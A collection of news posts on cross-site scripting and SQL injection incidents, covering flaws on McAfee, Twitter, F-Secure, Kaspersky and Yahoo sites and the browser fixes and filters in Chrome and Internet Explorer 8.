Updated 5:15 p.m. PDT with McAfee saying most of the vulnerabilities have been fixed.
Security researcher Mike Bailey released this screen shot showing that he gained access to McAfee Secure via a cross-site request forgery hole.
(Credit: Skeptikal.org)Security vulnerabilities on McAfee sites, including one designed to scan customers' sites for flaws, exposed certain customer accounts and could have been used for phishing attacks in which malware disguised as McAfee software could be distributed, security experts say.
McAfee said late on Tuesday that most of the vulnerabilities were fixed, except for one part of the Web site that was taken offline to be fixed.
The McAfee sites were found to be vulnerable to cross-site scripting (XSS) attacks and cross-site request forgery attacks that could lead to phishing attacks on customers who think they are visiting the security vendor's site, according to an article on ReadWriteWeb.
Ironically, one of the vulnerable sites was McAfee Secure, which scans customer sites to determine if they are vulnerable to such attacks. The problem would signal that either McAfee doesn't run McAfee Secure across all of its own sites or the product doesn't work well, the report said.
To fall victim to a cross-site request forgery attack on that site, targets would have to be logged into their McAfee accounts and browse to a malicious Web site that exploits the vulnerability, according to the Risky.biz site.
Such attacks on sites of antivirus vendors are particularly dangerous because they enable attackers to create fake versions of security products that install Trojans or other malware and customers will trust it, Lance James, co-founder of Secure Science Corporation, told ReadWriteWeb.
The hole on the McAfee Secure site would indicate that the company failed to comply with PCI requirements for Approved Scanning Vendors, didn't use a secure software development lifecycle in building the application, and neglected to do an in-depth penetration test of the site, security researcher Mike Bailey wrote on his Skeptikal.org blog on Monday.
McAfee spokesman Joris Evers said the site taken offline was the McAfee Knowledge Center, which is part of its customer support site that uses software from a third-party provider. The site had a cross-site scripting vulnerability, he said.
"These types of vulnerabilities are rarely exploited in the wild and thus aren't deemed to be severe," he said in an e-mail. None of the vulnerabilities exposed any McAfee corporate information and the company had not seen any malicious exploitation of the vulnerabilities, he added.
"McAfee has strict policies in place for its own Web sites and for services provided by third parties," Evers said. "We are investigating how these particular vulnerabilities were not identified in our screening process and will adjust our processes if necessary."
McAfee isn't the only security company to have security problems on its site. Last month, The Register reported on a cross-site scripting vulnerability on Symantec's site. And in February, a Romanian hacker site claimed to have used cross-site scripting and SQL injection attacks to breach the sites of F-Secure, Kaspersky, and BitDefender.
Google released a new version of its Chrome browser Thursday to fix a high-severity security problem.
The problem affects Google's mainstream stable version of Chrome and is fixed in the new version 1.0.154.59 (download). Google has built Chrome so it updates itself automatically with no user intervention, though the software must be restarted for the new version to run.
The security problem, reported April 8 by Roi Saltzman of the IBM Rational Application Security Research Group, allowed cross-site scripting attacks. Such methods can make a Web browser process unauthorized code such as JavaScript, enabling a variety of attacks, including impersonation or phishing.
Mark Larson, Google Chrome program manager, described the problem this way in a blog posting Thursday:
An error in handling URLs with a chromehtml: protocol could allow an attacker to run scripts of his choosing on any page or enumerate files on the local disk under certain conditions.
If a user has Google Chrome installed, visiting an attacker-controlled Web page in Internet Explorer could have caused Google Chrome to launch, open multiple tabs, and load scripts that run after navigating to a URL of the attacker's choice. Such an attack only works if Chrome is not already running.
Michael Mooney, aka "Mikeyy"
(Credit: Michael Mooney)The teenager who takes credit for the worms that hit Twitter earlier this week has been hired by a Web application development firm and on Friday released a fifth worm on the microblogging site, he said.
Twitter fought off four waves of worm attacks last weekend and into Monday in which Twitter users were infected just by clicking on the name or image of someone whose account was infected. The worms appeared to do no damage other than spread to infected users' followers and modify profile pages.
Michael Mooney, a 17-year-old living in Brooklyn, N.Y., told CNET News that he wrote the worms because he was bored and wanted to bring Twitter's attention to the security holes.
Mooney also grabbed the attention of Travis Rowland, founder of ExqSoft in Hammond, Ore., who has hired the teen.
Rowland told CNET News on Friday that he saw the worms on Twitter and was impressed with Mooney's skills so he contacted him about working for him doing security analysis. "I saw his Web site and he coded that all from hand and it was pretty impressive; it was a complete Twitter clone," Rowland said.
After landing the job, Mooney spread the latest worm, which exploits a fifth vulnerability at the site, he said. Asked why he doesn't contact Twitter directly instead of launching the attacks, the graduating high school senior said he had tried but had gotten no response.
"I just want to let (Twitters) know that my intent is not to aggravate them," Mooney said in a phone interview with CNET News. "It's probably not the best way, but it's the only way I can reach out to Twitter so they will fix the vulnerability."
The latest worm exploits a cross-site scripting vulnerability and posts messages from infected accounts that reference celebrities and references to Mooney getting hired by exqSoft, according to a blog post by Graham Cluley, a senior technology consultant with security firm Sophos.
Rowland blasted Twitter for not adequately protecting its site. "It's a complete failure on their part," he said.
Twitter executives did not respond to an e-mail seeking comment.
Mooney is not the first hacker to have parlayed online stunts into profit. A New Zealand teenager arrested in 2007 on charges of operating a huge botnet that was used to steal from bank accounts was asked to be a speaker at TelstraClear customer seminars late last year and was used in an advertising campaign for the telecom's global security unit, according to Computerworld.
"The author of the Anna Kournikova worm was told by his town's mayor that he would be welcome to work on their systems, the notorious teenager behind the Sasser and Network worms was hired by a security firm, and the creator of a Chinese worm which displayed pictures of pandas burning incense was offered a job by one of his victims," Cluley, wrote in a separate blog post.
Cluley criticized ExqSoft's hiring of Mooney, saying the teen should not be rewarded for behaving irresponsibly. The teen not only wasted the time of thousands of Twitter users and company engineers, Cluley said,but put Twitterers at risk of having their identities stolen or malware installed on their machines by financially-motivated hackers who could have used the cross-site scripting flaw that Mooney used.
"In my opinion, I don't believe it was malicious," said Rowland. "He could have been farming for personal information like e-mail addresses and phone numbers. He potentially could have exposed that information to any numerous sources."
In a tweet last weekend, Rowland implored Twitter to not prosecute Mooney, arguing that he did them a favor by alerting them to a security hole.
Asked earlier in the week about the prosecution scenario for Mooney, Jennifer Granick, an attorney with the Electronic Frontier Foundation, said in an e-mail: "If he's 17, he will not be federally prosecuted and the sentencing, should he be found or plead guilty, should be more about rehabilitation than punishment."
Rowland said he plans to help guide Mooney away from pranks and toward a promising career as a white hat hacker.
"He's got a lot of growing up to do but he's a really good guy and he has a lot of passion for what he does," Rowland said. "Hopefully, I can influence him in the right way."
(ABCNews reported on Mooney getting a job early on Friday.)
Twitter security engineers were cleaning up on Monday following a series of worm attacks over the weekend, including at least two credited to a bored 17-year-old.
In the first attack, which began early on Saturday, four new accounts began spreading a worm, compromising about 90 accounts, Twitter co-founder Biz Stone wrote in a posting on the Twitter blog.
The worms appeared to do no damage other than spread to infected users' followers and modify profile pages. You can get infected just by clicking on the name or image of someone whose account was infected.
Later that afternoon, about 100 accounts were compromised in a second wave, followed by another wave on Sunday morning, he wrote. Nearly 10,000 tweets that could have spread the worm were deleted, according to Stone.
Late on Sunday and into Monday morning, Twitter fended off another attack, he said. "Once again, we secured the compromised accounts and deleted any material that would further propagate the worm," he wrote. Stone declined an interview request from CNET News, saying he didn't have time.
The worms exploit a common vulnerability in Web applications called cross-site scripting, which allows someone to inject code into Web pages others are viewing.
In this instance, Twitter users who clicked on the name or image of anyone sending the worm messages would get infected and then send the message on to all that person's followers. Anyone viewing an infected user's profile would also get infected and pass the worm on.
Interviewed by CNET News on Sunday after the first two iterations circulated, Michael Mooney, a 17-year-old living in Brooklyn, said he created the worms out of boredom. The messages in the first outbreak included a link to rival microblogging site, Stalkdaily.com, which Mooney owns.
Mooney said in the interview that he did not plan on releasing any more worms targeting Twitter. He could not be reached for comment on Monday.
The first worm messages warned people not to go to the StalkDaily site, which would infect a Twitter user's account if they visited the site. The second worm message contained the phrase "Mikeyy" and the third referred to removing the Mikeyy worm but used "bit.ly" to add shortened URLs to messages, said Andy Hayter, anti-malcode program manager for ICSA Labs, which provides third-party validation for security products.
The most recent attack involved a message saying "Hire Mikeyy" and included Mooney's phone number, according to Graham Cluley, a senior technology consultant with security firm Sophos.
"What we're seeing was it was possible for codes to be embedded, small pieces of JavaScript, into people's profiles. This should be fairly elemental to filter out," he said.
While the attacks were mostly a nuisance, they could have been dangerous if spyware or other malware had been downloaded onto Twitter users' computers, Cluley said.
To avoid such JavaScript-based attacks, you can turn off JavaScript in your browser. Instructions for doing this are here. You can also use utilities such as NoScript, an open-source Firefox extension, Hayter recommended.
Users of infected Twitter accounts should also request a password reset and go to the settings page and delete any profile or other information that may have been added during the attack. To reset colors go to the profile design page.
Twittercism has detailed instructions on how to tell if you are infected and how to remove the worm.
And just like e-mail users should be careful what e-mail attachments they open, be careful who you follow on Twitter, Hayter said.
Updated 4:05 p.m. PDT with Sophos comment.
(Credit:
F-Secure)
Helsinki-based security firm F-Secure said on Thursday that a breach of its Web site earlier in the week by a Romanian hacker site was limited in scope and impact.
On Wednesday the HackersBlog site said it had used a SQL injection and cross-site scripting attack to get access to data on an F-Secure Web site. Earlier, the site had launched similar attacks on a site of security firm Kaspersky and one belonging to a partner of BitDefender.
F-Secure said the problem with its site was due to a bug in a Web application and not related to an unpatched system.
"One of our servers used in gathering malware statistics had a page that didn't properly sanitize input and was therefore vulnerable to attack," spokesman David Frazer said in an e-mail. "Fortunately we utilize defense-in-depth strategies so the attack was only partly successful. The Server was taken down immediately after the blog was discovered to ensure the SQL injection was contained and to also analyze the level of the threat."
Although the attackers could read the F-Secure database information, they were not able to write or manipulate the data and were unable to access any other data on that server because the SQL user only had access to its own database, he said. The data accessed was statistics information used for marketing purposes, he added.
"So while the attack is something we must learn from, it was very minimal with no impact to F-Secure, our partners or our customers," Frazer said.
A Romanian hacker site said on Wednesday it was able to breach the Web site of Helsinki-based security firm F-Secure just as it had gained access to the sites of two other security companies earlier in the week.
F-Secure is "vulnerable to SQL Injection plus Cross Site Scripting," an entry on the HackersBlog site said. "Fortunately, F-Secure doesn't leak sensitive data, just some statistics regarding past virus activity."
An F-Secure spokesman said the company had taken the affected server down and that it was a low-level server that was not critical to the company and had no sensitive or customer data on it, just statistical data for marketing purposes.
"It is slightly embarrassing as a security company that we have had the breach," David Frazer, a spokesman in F-Secure's San Jose, California office, said in a phone interview. "We certainly, as a security company, want to ensure that all of our servers are patched to the levels that they should be."
HackersBlog publicized on its site that it had breached the U.S. Web site of Moscow-based firm Kaspersky on Saturday and the Portugal site of BitDefender on Monday using the same attack techniques.
Kaspersky said on Monday that no sensitive or customer data had been exposed in the breach and that it would ask a database expert to audit its systems. BitDefender said the site that had been breached belonged to an unnamed partner and no customer data was stolen.
SQL injection attacks, in which a small malicious script is inserted into a database that feeds information to the Web site, have become very popular exploit methods. Cross-site scripting vulnerabilities, which allow for injection of malicious code in Web pages, also are common.
Updated 3:25 p.m. PST with F-Secure comment.
Yahoo's HotJobs site is vulnerable to a phishing-based attack that can give an attacker access to a Yahoo member's mail and other personal accounts, British network service firm Netcraft said Monday, and someone has been taking advantage of it.
In phishing, an attacker sends a bogus e-mail masquerading as a legitimate message from a company, in this case Yahoo HotJobs. Clicking on a link that includes specially formatted JavaScript code can cause the Web site to run a program because of a cross-site scripting vulnerability, Netcraft said.
"The script steals the authentication cookies that are sent for the yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," NetCraft said Monday. "Netcraft has informed Yahoo of the latest attack, although at the time of writing, the HotJobs vulnerability and the attacker's cookie harvesting script are both still present."
I'll update this post once Yahoo gets back to me with any comment.
Update 3:44 p.m. PDT: Yahoo acknowledged the vulnerability but said it's fixed now.
"The team was made aware of this particular cross-site scripting issue yesterday morning (Sunday, October 26) and a fix was deployed within a matter of hours. Yahoo appreciates Netcraft's assistance in identifying this issue," the company said in a statement. "As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com."
Yahoo wouldn't comment on how many people might have been affected.
Don't count Internet Explorer out just yet.
On Wednesday, Microsoft released the second public beta for Internet Explorer 8. If anything, this release brings IE up to par with alternative browsers such as Opera, Apple's Safari, and Mozilla's Firefox in terms of security and features. It also pushes Microsoft a little ahead of the competition.
The user interface hasn't changed much since Internet Explorer 8 Beta 1, except to add a Security pull-down menu between Page and Tools on the main toolbar. In addition to blocking phishing sites, IE 8 now highlights the main domain of any Web site you visit. Thus if you think you are on eBay's site and something other than ebay.com is highlighted, chances are you are on the wrong Web site.
IE 8 also contains a cross-site scripting filter, one of the first in a mainstream browser. Cross-site scripting allows an attacker to execute script on a user's browser without them knowing. When the IE 8 filter finds a Web page with a cross-site scripting request, it changes the content on the page with a notice. Users are not presented with an option; IE simply blocks the malicious script from executing and then displays the rest of the page.
In another feature, known as InPrivate, Microsoft allows the user to suspend caching functions while you surf. The scenarios for using InPrivate include when you're using someone else's computer, like for instance, when you need to buy a gift for a loved one without ruining the surprise, or when you're at an Internet kiosk and don't want the next person to know which Web site you visited. While you can currently clear the browser cache with a mouse click, it's an all-or-nothing action. InPrivate temporarily suspends the automatic caching functions, allowing you to keep the rest of your browsing history intact. Apple Safari has offered this feature for a while, but Mozilla Firefox does not.
IE 8 Beta 1 has already introduced several behind-the-scenes security changes. For example, ActiveX components will be installed per user, which eliminates the need for everyone to have administrator privileges. In addition, you must acknowledge or opt in for the component to run, eliminating drive-by downloads. Components will be per site and will only be available from the site of origin. Finally, site developers can request killbits from Microsoft which can be sent via Windows Update to terminate risky or outdated components.
Also, IE 8 Beta 1 included Microsoft's own brand of malware protection. Earlier this year, Opera added Haute Secure malware protection, and Mozilla enhanced its Google and StopBadware malware protection in Firefox 3.
See also:
Internet Explorer 8 Beta 2 screenshots
Review: Internet Explorer 8 beta 2
Daily Debrief video: The newest IE 8
- prev
- 1
- next
